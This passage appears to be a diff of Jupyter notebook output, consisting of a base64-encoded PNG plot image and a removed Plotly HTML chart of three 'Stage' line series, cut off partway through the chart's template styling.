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9o4kaf6KLXqhVZqebdlJI6d8Ff1hr+U3bumjLsP1RLMUtWrbV9+cu2L4t6Bkx4E4EREREREREREREQUiDsSJiIiIiIiIiIiIKBBxIE5EREREREREREREgYgDcSIiIiIiIiIiIiIKRByIExEREREREREREVEg4kCciIiIiIiIiIiIiAIRB+JEREREREREREREFIg4ECciIiIiIiIiIiKiQMSBOBEREREREREREREFIg7EiYiIiIiIiIiIiCgQcSBORERERERERERERIGIA3EiIiIiIiIiIiIiCkQciBMRERERERERERFRIOJAnIiIiIiIiIiIiIgCEQfiRERERERERERERBSIOBAnIiIiIiIiIiIiokDEgTgRERERERERERERBSIOxImIiIgo6eXmHdXzb3ROyp/1drt+Wvz19qT8WQ+XzNeZaE2attFTzVPVrvto5eUX6snXUurl677xcW89+VqK/vZ/6fXy9YiIiIiILONAnIiIiIgeuRats9WkaZs4f3iprSTpuzt3dbSwKClf65cOxKfOX6tX389UTU1N3Oe+v/dAf3q1vbbsOvSrf3ZDOxA/e6FYkpJ+IH7ru++VNXSG/vfNz/RU8w76uOsInTp3Ofr5XfuPcyBORERERIGIA3EiIiIieuRatM7W+JkrVFx24yEVSf9av3Qgfv3mt/rDS22Vf+xM3OeWrt2hv7yZpnC46lf/7KAciH+aOUafZo5R0eVSlVyrUO8Rs/RCqzRFItWSOBAnIiIiouDEgTgRERERPXItWmdr7tJNv/j5nx407z5wQs3+
1UM52w7orU/66sW3u6pTr/G6dz8kSaqurtG46cvV9J10/enV9nq7XT8dPHo6+mf92iNTOmaPV/bwmXEff7/DII2ZtlSSVH7jljr3nqDn3+ispu+kq++o2bp770Hc69yYmx93KJzef4pGTF4sSRozban6jPxSg8cv0KvvZ6rpO+nanndEi7/epjc+7q0XWqXpy682RH+v88MaPH6Bnn+js55r2UntM8fqSsn1X/x39vCB+LMtOyk376heeT9TT76Wos96T9SDkPe7XsuiVdtUdr0y+s8Xr15Tk6ZtdP3mt5I4ECciIiKi4MSBOBERERE9co9yIJ6XX6g/vdpeI6d8pZqaGj0IeXrl/UwtWLFFkrQyZ7deaJWmi1evyXO+5izdqOf/0Tn67u5fOxDfsfeonmiWovsPvOjHfjzsvVxcrpqaGrVq21d9R83WvfshVX57Rx93HaG0PhPjXudvHYh/PmO5nn69gwpOnJMkTZi1Us+27KSp89ZIkvKPndF///0T3b5zT5I0dvoyfdRluCoqb8v5YU38cpVe+3dPVUUiP/t3efhA/IlmKeoz8kt9d+euissq9OLbXbVw5dbf9Vp+2p279zV4/AK93a6fqqt/eNwMB+JEREREFJQ4ECciIiKiR+5RD8SbNG0TczibPXymBn0+X9IP76T+7s7d6Odu37mnJk3b6FJxuaRfPxCvikT04ttdtTJnd/RjPx5ES9LJ0xfjvva+w6f0X39rq/sPvEc+EP9n6sDo5378e935/r4kKVwVUZOmbfTNuSuqqanRU81TdejY2eivj0Sq9eRrKTEf+2kPH4g3adpGld/eiX4+a+iM6L+zR3ktP+3lf3ZTk6Zt9FGX4TF/NgfiRERERBSUOBAnIiIiokeuRets/dff2uoPL8V6u10/SfEH4k80i30edr/Rc9R7xCxJ0p3v72vQ5/PV8qNeevmf3aKHtj8eDv/agbj0w7ujP+g8VNIPh84vvt1V67bukyRtyD2o/33zs5hfX1xWoSZN2+j8pdJHPhD/rPfE6OcOHTurP77cLubX/+GltjpaeF43b93+2R862qRpG63elPezf4+HD8T//Gr7X/x39iivJfbvfkOHj59VWp+JertdP3nOl8SBOBEREREFJw7EiYiIiOiRa9E6W2OmLlXR5dIYxWU3JMUfiD/8AyJ/eribPXym/tVpiG7eui1Junc/9EgH4iXXKqKPSNl94ISebdkpetC7Ifeg/vJmWsyvLy67oSZN26jo8m8fiHftNznmQPzHR61I//8Q+pVPY379j4fQld/eifk71Kbf+qGaDx+I1/a1/Fzhqoiefr2DNu88JIkDcSIiIiIKThyIExEREdEj96iPTPm1w91m/+oR88iTg0dPP9KBuCS16zZaX8xdrR5DpmnYxIXRjxeevRz3yJQ9B0/oDy+11YNQ7CNTduw9Gnd4/s/Ugb/rQFySnmreIfpO9R/76Q+2fLi6OhC/9d33avavHiq6XBr9XHV1jZ5+vYO27OJAnIiIiIiCFQfiRERERPTIJfNA/OOuI5Q9fKaqq2t08UqZOmR9rv/5ezvtOXhCUu0OxDftyNc/Puqlp5p30LmLJTGfe+fT/howdq4ehDxdv/mt/tVpiLoPmhr3Oi8Vl6tJ0zY6U3RVkrT7wAk91bzD7z4QHzt9mV7/MEuXi8sVropoyZpcPdeyU8wPAP1pdfkO8Q86D1XrtOE6e6FYpeU3NWLyYj3TomP0OeIciBMRERFRUOJAnIiIiIgeuWQeiBeevaw3Pu6tp5qn6qMuw1X8/9q5e5YuoDCMw9+nzZQgA8UhE0FBkCAQA8mXVCQECVs0FUTEpKmhwJfZr+Kg0CIugoNJ4FSmDo+D0CJBQsYf7utaz4HnnPXH4Rx/q3fLn+tR91jt7h/8VRC/vLyq1t6Jej4yf2vt6PikhqZXqunpq+rof1PvP2zVj5/nt85ZVfXxy0619U1V98DbWlzfrrnVjVpcv3lxftcIff7roubX
Nutxz3g97ByuF68Xau/r4R/vcJ9B/PT7Wc0sfKonvZPV0jVaA5NLtbt/8HuvIA4AQApBHAAAGsBd/xz/lwRxAABSCOIAANAABHEAALh/gjgAADSAB+0vq6VrpIamV/7r3J7B2Wp+NiyIAwAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABEEcQAAAAAAIgjiAAAAAABEEMQBAAAAAIggiAMAAAAAEEEQBwAAAAAggiAOAAAAAEAEQRwAAAAAgAiCOAAAAAAAEQRxAAAAAAAiCOIAAAAAAEQQxAEAAAAAiCCIAwAAAAAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABGuAWuGU1+u9CwfAAAAAElFTkSuQmCC",
- "text/html": [
- "<div> <div id=\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\" class=\"plotly-graph-div\" style=\"height:900px; width:100%;\"></div> <script type=\"text/javascript\"> require([\"plotly\"], function(Plotly) { window.PLOTLYENV=window.PLOTLYENV || {}; if (document.getElementById(\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\")) { Plotly.newPlot( \"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\", [{\"mode\":\"lines\",\"name\":\"Stage 1\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x3\",\"y\":[6725.0,7.75,-0.0],\"yaxis\":\"y3\"},{\"mode\":\"lines\",\"name\":\"Stage 2\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x2\",\"y\":[11787.5,226.93,0.62],\"yaxis\":\"y2\"},{\"mode\":\"lines\",\"name\":\"Stage 3\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x\",\"y\":[15425.0,576.31,161.68],\"yaxis\":\"y\"}], {\"height\":900,\"template\":{\"data\":{\"bar\":[{\"error_x\":{\"color\":\"#2a3f5f\"},\"error_y\":{\"color\":\"#2a3f5f\"},\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"bar\"}],\"barpolar\":[{\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"barpolar\"}],\"carpet\":[{\"aaxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"baxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"type\":\"carpet\"}],\"choropleth\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"choropleth\"}],\"contour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666